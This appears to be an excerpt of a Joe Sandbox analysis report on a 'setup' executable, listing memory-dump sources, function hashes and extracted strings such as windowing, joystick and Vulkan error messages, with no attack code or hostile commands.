                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: abort$strlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2656325428-0
                                                                                                    • Opcode ID: bdadab97ef66c901d4d6e6de9bf54786b43cf90c419f741cecc3054040dabf74
                                                                                                    • Instruction ID: a4dd76c6989f28087c165789fe8edbae85a654ba0e99b787dd31b54008606bec
                                                                                                    • Opcode Fuzzy Hash: bdadab97ef66c901d4d6e6de9bf54786b43cf90c419f741cecc3054040dabf74
                                                                                                    • Instruction Fuzzy Hash: 01318EB41283C6CAE711CF28E8457597FD46BA6309F044578EA8497793D3B98908CB6F
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: freemallocrealloc$memcpy
                                                                                                    • String ID: read$write
                                                                                                    • API String ID: 2810443421-1125055369
                                                                                                    • Opcode ID: d258412df75102684e2670389bfb5666c49563ed35c5dca0e9441bf4523a5fe3
                                                                                                    • Instruction ID: 0067af096f33c896d9e8499de86bdedcfb89eb74ae3bffddaede5e171d3fa197
                                                                                                    • Opcode Fuzzy Hash: d258412df75102684e2670389bfb5666c49563ed35c5dca0e9441bf4523a5fe3
                                                                                                    • Instruction Fuzzy Hash: 67F101B59083558FC721DF68C48066EBBF0BF89754F15892EF9C9A7301E375E9848B82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Char_wmkdirstrcpy
                                                                                                    • String ID: %s$ERROR: can't alloc %lu memory bytes$ERROR: can't open file %s
                                                                                                    • API String ID: 145990715-3391998779
                                                                                                    • Opcode ID: cecf1ca042fa4d545eee0e7f11901556f7770d16adfcc3f80aadc5b83877049a
                                                                                                    • Instruction ID: bb33713ce7f8eb7d3f82a676a3a97989977a4d9b23e34d9f696c858ff5f7e0a3
                                                                                                    • Opcode Fuzzy Hash: cecf1ca042fa4d545eee0e7f11901556f7770d16adfcc3f80aadc5b83877049a
                                                                                                    • Instruction Fuzzy Hash: 6FE126B46183058FCB10EF28C58461ABBE5FF89310F15896DED888B346D771E8A5CB92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Invalid input mode 0x%08X, xrefs: 00240476
                                                                                                    • Raw mouse motion is not supported on this system, xrefs: 002405EC
                                                                                                    • Win32: Failed to register raw input device, xrefs: 0024F212
                                                                                                    • Win32: Failed to remove raw input device, xrefs: 0024F1B6
                                                                                                    • Invalid cursor mode 0x%08X, xrefs: 002404F0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor
                                                                                                    • String ID: Invalid cursor mode 0x%08X$Invalid input mode 0x%08X$Raw mouse motion is not supported on this system$Win32: Failed to register raw input device$Win32: Failed to remove raw input device
                                                                                                    • API String ID: 3268636600-2247386432
                                                                                                    • Opcode ID: f4bc22ec13c31d55f0be37f42640d09b603e06a5f2d78858ca8e52e09df4eb7f
                                                                                                    • Instruction ID: 691a8c53c7aa17e83792ee87979d44f2093421729aded07ea24d8f8fb00d6714
                                                                                                    • Opcode Fuzzy Hash: f4bc22ec13c31d55f0be37f42640d09b603e06a5f2d78858ca8e52e09df4eb7f
                                                                                                    • Instruction Fuzzy Hash: 80B18FB18183428FDB55EF24D68435ABBE4FF85304F45497EE8898B206D3B8D994CF92
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 39653677-0
                                                                                                    • Opcode ID: 407815d839711de72e075415c4d0c7b20a4545c105fa74919e7d2ca1bf9af811
                                                                                                    • Instruction ID: 7ea795140239fd652968f5ce65e903a898e030a5d613b94c4a6b05f2ce959914
                                                                                                    • Opcode Fuzzy Hash: 407815d839711de72e075415c4d0c7b20a4545c105fa74919e7d2ca1bf9af811
                                                                                                    • Instruction Fuzzy Hash: D531CBB16243419FEB24DF2CD585B2AB7E0AF81305F10897EEA98D7252D374C858CB46
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClientWindow$LongScreen$Rect
                                                                                                    • String ID: 4$Invalid window attribute 0x%08X
                                                                                                    • API String ID: 911421538-3363298114
                                                                                                    • Opcode ID: fee9ea709ddad00c9eeaf54c40dbccdee981ece6f4180fdafa28f9a453205977
                                                                                                    • Instruction ID: 22abc0703af670630b8155f9009eeacebd3172fce8f1ec18c36f2aaedbb8437d
                                                                                                    • Opcode Fuzzy Hash: fee9ea709ddad00c9eeaf54c40dbccdee981ece6f4180fdafa28f9a453205977
                                                                                                    • Instruction Fuzzy Hash: B6D128B4A193028FDB04EF28D58871ABBF4FF85305F15892DE8898B315E774D894CB82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • 05000000%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x00, xrefs: 00248772
                                                                                                    • Win32: Failed to set device axis mode, xrefs: 002488C0
                                                                                                    • Win32: Failed to create device, xrefs: 00248960
                                                                                                    • 03000000%02x%02x0000%02x%02x000000000000, xrefs: 00248926
                                                                                                    • Win32: Failed to convert joystick name to UTF-8, xrefs: 002488A0
                                                                                                    • Win32: Failed to set device data format, xrefs: 00248894
                                                                                                    • Win32: Failed to query device capabilities, xrefs: 00248860
                                                                                                    • PIDV, xrefs: 00248756
                                                                                                    • ,, xrefs: 002485E3
                                                                                                    • Win32: Failed to enumerate device objects, xrefs: 002488D0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: freesprintf$ByteCharMultiWidecallocqsort
                                                                                                    • String ID: ,$03000000%02x%02x0000%02x%02x000000000000$05000000%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x00$PIDV$Win32: Failed to convert joystick name to UTF-8$Win32: Failed to create device$Win32: Failed to enumerate device objects$Win32: Failed to query device capabilities$Win32: Failed to set device axis mode$Win32: Failed to set device data format
                                                                                                    • API String ID: 3181258603-2786012021
                                                                                                    • Opcode ID: 4aa2cc3e38ab5c669ba60ae746ba38c09466d435225a3ca4b259ae76f9aad5ac
                                                                                                    • Instruction ID: 2fa1dca6f446d830d99ca7d6acd1d56eea482406d882e6d10ec7c5bfffd78df0
                                                                                                    • Opcode Fuzzy Hash: 4aa2cc3e38ab5c669ba60ae746ba38c09466d435225a3ca4b259ae76f9aad5ac
                                                                                                    • Instruction Fuzzy Hash: ACB1BBB49287418FD314EF29C18475FBBE0AF89304F10892EE9989B315D7B4D989DF82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Vulkan: Failed to query instance extensions: %s, xrefs: 002451DB
                                                                                                    • Vulkan: Loader not found, xrefs: 002450F0
                                                                                                    • Vulkan: Window surface creation extensions not found, xrefs: 002450D0
                                                                                                    • Vulkan: Loader does not export vkGetInstanceProcAddr, xrefs: 0024520D
                                                                                                    • Vulkan: Failed to query instance extension count: %s, xrefs: 0024507B
                                                                                                    • vulkan-1.dll, xrefs: 00244FF0
                                                                                                    • VK_KHR_win32_surface, xrefs: 0024518D
                                                                                                    • Vulkan: Failed to retrieve vkEnumerateInstanceExtensionProperties, xrefs: 00245233
                                                                                                    • vkGetInstanceProcAddr, xrefs: 0024500D
                                                                                                    • VK_KHR_surface, xrefs: 00245156
                                                                                                    • vkEnumerateInstanceExtensionProperties, xrefs: 0024502E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: VK_KHR_surface$VK_KHR_win32_surface$Vulkan: Failed to query instance extension count: %s$Vulkan: Failed to query instance extensions: %s$Vulkan: Failed to retrieve vkEnumerateInstanceExtensionProperties$Vulkan: Loader does not export vkGetInstanceProcAddr$Vulkan: Loader not found$Vulkan: Window surface creation extensions not found$vkEnumerateInstanceExtensionProperties$vkGetInstanceProcAddr$vulkan-1.dll
                                                                                                    • API String ID: 145871493-927530291
                                                                                                    • Opcode ID: 03699c3f29292c3f58bc1adf7a6dc1ed2d7b6c25ab5e67c6ca4d7800b3aedf2a
                                                                                                    • Instruction ID: e1d45ed9bd36baad3f15c1851cfc89e78cac8873608c64e26e5300a10cb8fc44
                                                                                                    • Opcode Fuzzy Hash: 03699c3f29292c3f58bc1adf7a6dc1ed2d7b6c25ab5e67c6ca4d7800b3aedf2a
                                                                                                    • Instruction Fuzzy Hash: 29515FB5A287118FD714BF74E94532BBBE0EB45744F15883DE8CC87211E7B588A8CB82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$malloc$Char_closeexitlongjmp
                                                                                                    • String ID: %s$@q($ERROR: can't close file %s$Ts;$Ts;$read
                                                                                                    • API String ID: 2545666375-20730449
                                                                                                    • Opcode ID: 2be5710dd91e27ad3e42088a5cf43a88e2b2167b3ed5caffe268f8cb8f1a96d4
                                                                                                    • Instruction ID: 90284ececa369331a3f22d852ee983d8c8f076c1af37ea23d31307124817a906
                                                                                                    • Opcode Fuzzy Hash: 2be5710dd91e27ad3e42088a5cf43a88e2b2167b3ed5caffe268f8cb8f1a96d4
                                                                                                    • Instruction Fuzzy Hash: F051E6B4A087199BCB21EF64C8856EDB7F0AF05340F4188ADE988E7241D774DE94CF81
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
